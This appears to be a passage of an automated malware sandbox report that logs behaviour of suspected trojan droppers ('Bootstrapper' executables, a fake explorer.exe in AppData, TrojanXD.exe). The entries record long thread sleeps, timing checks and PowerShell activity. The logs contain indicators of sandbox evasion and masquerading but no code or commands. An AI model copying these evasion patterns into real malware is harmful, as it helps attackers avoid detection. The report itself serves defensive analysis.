                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1AA40000 memory reserve | memory write watch
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeCode function: 39_2_00000207DE5869B2 rdtsc 39_2_00000207DE5869B2
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599765Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599436Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599327Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599218Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599108Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598890Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598781Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598662Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598531Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598417Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598311Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598203Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 598094Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597981Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597863Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597544Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597422Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597312Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597203Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 597093Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596873Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596765Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596654Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596546Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596437Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596321Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596218Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 596109Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595999Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595890Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595781Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595668Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595562Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595453Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 595326Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 594906Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 594796Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599891
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599772
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599653
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599532
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599297
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599172
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 599063
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598938
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598813
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598688
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598563
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598452
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598344
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598230
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598110
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 598000
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597891
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597766
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597656
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597547
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597438
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597313
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597190
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 597065
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596939
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596625
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596507
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596391
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596282
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596157
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 596032
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595907
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595797
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595688
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595563
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595438
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595313
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595188
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 595078
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594969
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594844
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594735
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594610
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594485
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594368
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 594259
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 593766
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 593633
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 593492
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeThread delayed: delay time: 564023
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeWindow / User API: threadDelayed 1024Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeWindow / User API: threadDelayed 8814Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeWindow / User API: threadDelayed 3506Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeWindow / User API: threadDelayed 4766Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5833
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3882
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeWindow / User API: threadDelayed 4007
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeWindow / User API: threadDelayed 4916
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7620
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1966
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6260
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3467
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6209
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3465
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeAPI coverage: 0.0 %
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe TID: 8000Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -599765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -599436s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -599327s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -599218s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -599108s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -599000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -598890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -598781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -598662s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -598531s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -598417s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -598311s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -598203s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -598094s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -597981s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -597863s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -597672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -597544s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -597422s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -597312s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -597203s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -597093s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -596984s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -596873s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -596765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -596654s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -596546s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -596437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -596321s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -596218s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -596109s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -595999s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -595890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -595781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -595668s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -595562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -595453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -595326s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -594906s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7204Thread sleep time: -594796s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 1532Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 6508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -28592453314249787s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -599891s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -599772s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -599653s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -599532s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -599297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -599172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -599063s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -598938s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -598813s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -598688s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -598563s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -598452s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -598344s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -598230s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -598110s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -598000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -597891s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -597766s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -597656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -597547s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -597438s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -597313s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -597190s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -597065s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -596939s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -596625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -596507s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -596391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -596282s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -596157s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -596032s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -595907s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -595797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -595688s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -595563s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -595438s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -595313s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -595188s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -595078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -594969s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -594844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -594735s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -594610s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -594485s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -594368s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -594259s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -593766s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -593633s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -593492s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe TID: 7672Thread sleep time: -564023s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep count: 7620 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep count: 1966 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1576Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 6209 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 3465 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 5564Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 5912Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 6648Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 7532Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3252Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 5728Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 2448Thread sleep count: 256 > 30
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 2448Thread sleep time: -22118400000s >= -30000s
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 2448Thread sleep time: -86400000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\explorer.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\explorer.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\explorer.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\explorer.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\explorer.exeFile Volume queried: C:\ FullSizeInformation
